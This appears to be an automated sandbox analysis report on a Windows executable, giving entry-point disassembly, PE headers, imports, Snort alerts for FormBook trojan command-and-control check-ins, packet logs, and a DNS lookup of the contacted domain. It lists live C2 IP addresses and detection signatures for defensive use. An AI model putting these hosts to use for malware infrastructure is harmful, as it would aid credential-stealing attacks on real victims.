                                                                      Instruction
                                                                      sub esp, 0000017Ch
                                                                      push ebx
                                                                      push ebp
                                                                      push esi
                                                                      xor esi, esi
                                                                      push edi
                                                                      mov dword ptr [esp+18h], esi
                                                                      mov ebp, 00409240h
                                                                      mov byte ptr [esp+10h], 00000020h
                                                                      call dword ptr [00407030h]
                                                                      push esi
                                                                      call dword ptr [00407270h]
                                                                      mov dword ptr [007A3030h], eax
                                                                      push esi
                                                                      lea eax, dword ptr [esp+30h]
                                                                      push 00000160h
                                                                      push eax
                                                                      push esi
                                                                      push 0079E540h
                                                                      call dword ptr [00407158h]
                                                                      push 00409230h
                                                                      push 007A2780h
                                                                      call 00007FA370EE84D8h
                                                                      mov ebx, 007AA400h
                                                                      push ebx
                                                                      push 00000400h
                                                                      call dword ptr [004070B4h]
                                                                      call 00007FA370EE5C19h
                                                                      test eax, eax
                                                                      jne 00007FA370EE5CD6h
                                                                      push 000003FBh
                                                                      push ebx
                                                                      call dword ptr [004070B0h]
                                                                      push 00409228h
                                                                      push ebx
                                                                      call 00007FA370EE84C3h
                                                                      call 00007FA370EE5BF9h
                                                                      test eax, eax
                                                                      je 00007FA370EE5DF2h
                                                                      mov edi, 007A9000h
                                                                      push edi
                                                                      call dword ptr [00407140h]
                                                                      call dword ptr [004070ACh]
                                                                      push eax
                                                                      push edi
                                                                      call 00007FA370EE8481h
                                                                      push 00000000h
                                                                      call dword ptr [00407108h]
                                                                      cmp byte ptr [007A9000h], 00000022h
                                                                      mov dword ptr [007A2F80h], eax
                                                                      mov eax, edi
                                                                      jne 00007FA370EE5CBCh
                                                                      mov byte ptr [esp+10h], 00000022h
                                                                      mov eax, 00000001h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x2f05b.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x3ac0000x2f05b0x2f200False0.36241089191data6.22523060047IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0x3ac3100x709ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                      RT_ICON0x3b33b00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 318767104, next used block 117440512
                                                                      RT_ICON0x3c3bd80x94a8data
                                                                      RT_ICON0x3cd0800x5488data
                                                                      RT_ICON0x3d25080x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 224, next used block 117440512
                                                                      RT_ICON0x3d67300x25a8data
                                                                      RT_ICON0x3d8cd80x10a8data
                                                                      RT_ICON0x3d9d800x988data
                                                                      RT_ICON0x3da7080x468GLS_BINARY_LSB_FIRST
                                                                      RT_DIALOG0x3dab700x100dataEnglishUnited States
                                                                      RT_DIALOG0x3dac700x11cdataEnglishUnited States
                                                                      RT_DIALOG0x3dad8c0x60dataEnglishUnited States
                                                                      RT_GROUP_ICON0x3dadec0x84data
                                                                      RT_MANIFEST0x3dae700x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                      Imports

                                                                      DLLImport
                                                                      KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                      USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                      SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      04/08/21-13:22:17.851992TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4162.241.244.61
                                                                      04/08/21-13:22:17.851992TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4162.241.244.61
                                                                      04/08/21-13:22:17.851992TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.4162.241.244.61
                                                                      04/08/21-13:22:23.881720TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.4107.178.142.156
                                                                      04/08/21-13:22:23.881720TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.4107.178.142.156
                                                                      04/08/21-13:22:23.881720TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.4107.178.142.156
                                                                      04/08/21-13:22:50.107975TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.435.246.6.109
                                                                      04/08/21-13:22:50.107975TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.435.246.6.109
                                                                      04/08/21-13:22:50.107975TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.435.246.6.109
                                                                      04/08/21-13:22:55.232579TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.434.102.136.180
                                                                      04/08/21-13:22:55.232579TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.434.102.136.180
                                                                      04/08/21-13:22:55.232579TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.434.102.136.180
                                                                      04/08/21-13:22:55.347369TCP1201ATTACK-RESPONSES 403 Forbidden804977434.102.136.180192.168.2.4
                                                                      04/08/21-13:23:23.204497ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                                      04/08/21-13:23:24.222015ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                                      04/08/21-13:23:26.237204ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 8, 2021 13:22:07.208076954 CEST4975180192.168.2.466.96.161.160
                                                                      Apr 8, 2021 13:22:07.318911076 CEST804975166.96.161.160192.168.2.4
                                                                      Apr 8, 2021 13:22:07.319055080 CEST4975180192.168.2.466.96.161.160
                                                                      Apr 8, 2021 13:22:07.319251060 CEST4975180192.168.2.466.96.161.160
                                                                      Apr 8, 2021 13:22:07.437031031 CEST804975166.96.161.160192.168.2.4
                                                                      Apr 8, 2021 13:22:07.443166971 CEST804975166.96.161.160192.168.2.4
                                                                      Apr 8, 2021 13:22:07.443207026 CEST804975166.96.161.160192.168.2.4
                                                                      Apr 8, 2021 13:22:07.443396091 CEST4975180192.168.2.466.96.161.160
                                                                      Apr 8, 2021 13:22:07.443444014 CEST4975180192.168.2.466.96.161.160
                                                                      Apr 8, 2021 13:22:07.554378986 CEST804975166.96.161.160192.168.2.4
                                                                      Apr 8, 2021 13:22:17.702614069 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:17.851721048 CEST8049764162.241.244.61192.168.2.4
                                                                      Apr 8, 2021 13:22:17.851872921 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:17.851991892 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:17.994587898 CEST8049764162.241.244.61192.168.2.4
                                                                      Apr 8, 2021 13:22:18.359489918 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:18.542831898 CEST8049764162.241.244.61192.168.2.4
                                                                      Apr 8, 2021 13:22:18.669209003 CEST8049764162.241.244.61192.168.2.4
                                                                      Apr 8, 2021 13:22:18.669230938 CEST8049764162.241.244.61192.168.2.4
                                                                      Apr 8, 2021 13:22:18.669306040 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:18.669331074 CEST4976480192.168.2.4162.241.244.61
                                                                      Apr 8, 2021 13:22:23.712862968 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:23.881352901 CEST8049770107.178.142.156192.168.2.4
                                                                      Apr 8, 2021 13:22:23.881531954 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:23.881720066 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:24.249051094 CEST8049770107.178.142.156192.168.2.4
                                                                      Apr 8, 2021 13:22:24.391254902 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:24.557790995 CEST8049770107.178.142.156192.168.2.4
                                                                      Apr 8, 2021 13:22:27.418097019 CEST8049770107.178.142.156192.168.2.4
                                                                      Apr 8, 2021 13:22:27.418112040 CEST8049770107.178.142.156192.168.2.4
                                                                      Apr 8, 2021 13:22:27.418188095 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:27.418340921 CEST4977080192.168.2.4107.178.142.156
                                                                      Apr 8, 2021 13:22:44.781671047 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:44.891897917 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:44.892003059 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:44.892147064 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:45.002394915 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002899885 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002926111 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002974033 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002993107 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.003007889 CEST8049771199.59.242.153192.168.2.4
                                                                      Apr 8, 2021 13:22:45.003110886 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:45.003139019 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:45.003252983 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:50.074331045 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.107506990 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.107790947 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.107975006 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.139882088 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.173912048 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.173933983 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.174128056 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.174240112 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.206252098 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:55.219860077 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.232299089 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.232404947 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.232578993 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.245090008 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.347368956 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.347384930 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.347610950 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.361360073 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:23:00.419142962 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.599010944 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.599234104 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.599381924 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.779186964 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.805794001 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.805819988 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.805941105 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.806032896 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.985886097 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.522414923 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.701513052 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.701639891 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.701818943 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.880739927 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.904542923 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.904571056 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.904774904 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.904892921 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:07.083766937 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:11.994615078 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.006978989 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.007117987 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.007415056 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.019741058 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111870050 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111903906 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111923933 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111938953 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111954927 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112023115 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.112061024 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112114906 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.112117052 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112144947 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112189054 CEST4977880192.168.2.4216.239.36.21

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 8, 2021 13:21:13.343260050 CEST5912353192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:13.362189054 CEST53591238.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:13.465718985 CEST5453153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:13.478009939 CEST53545318.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:19.525571108 CEST4971453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:19.538274050 CEST53497148.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:21.111433983 CEST5802853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:21.124315977 CEST53580288.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:21.868928909 CEST5309753192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:21.881489038 CEST53530978.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:22.641695976 CEST4925753192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:22.654412985 CEST53492578.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:23.398318052 CEST6238953192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:23.410882950 CEST53623898.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:24.547111988 CEST4991053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:24.597687006 CEST53499108.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:25.536561966 CEST5585453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:25.548954010 CEST53558548.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:26.429022074 CEST6454953192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:26.441953897 CEST53645498.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:27.105659008 CEST6315353192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:27.118328094 CEST53631538.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:28.168332100 CEST5299153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:28.180963039 CEST53529918.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:28.969247103 CEST5370053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:28.982186079 CEST53537008.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:29.601039886 CEST5172653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:29.614193916 CEST53517268.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:30.808002949 CEST5679453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:30.820566893 CEST53567948.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:31.515443087 CEST5653453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:31.528103113 CEST53565348.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:32.282509089 CEST5662753192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:32.295661926 CEST53566278.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:33.046641111 CEST5662153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:33.059272051 CEST53566218.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:33.705163002 CEST6311653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:33.717596054 CEST53631168.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:43.289284945 CEST6407853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:43.302186012 CEST53640788.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:21:57.012099981 CEST6480153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:21:57.029795885 CEST53648018.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:07.081368923 CEST6172153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:07.200592995 CEST53617218.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:07.438846111 CEST5125553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:07.452756882 CEST53512558.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:09.531831026 CEST6152253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:09.544730902 CEST53615228.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:10.179213047 CEST5233753192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:10.192509890 CEST53523378.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:10.773109913 CEST5504653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:10.785067081 CEST53550468.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:11.014154911 CEST4961253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:11.041070938 CEST53496128.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:11.115132093 CEST4928553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:11.128747940 CEST53492858.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:11.542536974 CEST5060153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:11.556617975 CEST53506018.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:12.122549057 CEST6087553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:12.197274923 CEST53608758.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:12.456660032 CEST5644853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:12.511807919 CEST53564488.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:12.653134108 CEST5917253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:12.666035891 CEST53591728.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:13.690680981 CEST6242053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:13.703289032 CEST53624208.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:15.543047905 CEST6057953192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:15.674556971 CEST53605798.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:16.029027939 CEST5018353192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:16.133337975 CEST53501838.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:17.520349979 CEST6153153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:17.701608896 CEST53615318.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:23.405999899 CEST4922853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:23.537040949 CEST5979453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:23.561050892 CEST53597948.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:23.711600065 CEST53492288.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:29.411036968 CEST5591653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:29.453022957 CEST53559168.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:34.461175919 CEST5275253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:34.608465910 CEST53527528.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:44.664508104 CEST6054253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:44.780318975 CEST53605428.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:50.023492098 CEST6068953192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:50.072901964 CEST53606898.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:54.189313889 CEST6420653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:54.202052116 CEST53642068.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:55.178546906 CEST5090453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:55.218827963 CEST53509048.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:55.892683983 CEST5752553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:55.906056881 CEST53575258.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:00.396368027 CEST5381453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:00.417926073 CEST53538148.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:06.480061054 CEST5341853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:06.521147013 CEST53534188.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:11.916363001 CEST6283353192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:11.993323088 CEST53628338.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:17.182508945 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:18.192764997 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:19.208389044 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:21.224176884 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:22.195578098 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:23.204312086 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:24.221883059 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:26.237104893 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:27.210115910 CEST4994453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:27.627649069 CEST53499448.8.8.8192.168.2.4

                                                                      ICMP Packets

                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                      Apr 8, 2021 13:23:23.204497099 CEST192.168.2.48.8.8.8cffe(Port unreachable)Destination Unreachable
                                                                      Apr 8, 2021 13:23:24.222014904 CEST192.168.2.48.8.8.8cffe(Port unreachable)Destination Unreachable
                                                                      Apr 8, 2021 13:23:26.237204075 CEST192.168.2.48.8.8.8cffe(Port unreachable)Destination Unreachable

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Apr 8, 2021 13:22:07.081368923 CEST192.168.2.48.8.8.80xd067Standard query (0)www.1364kensington.comA (IP address)IN (0x0001)
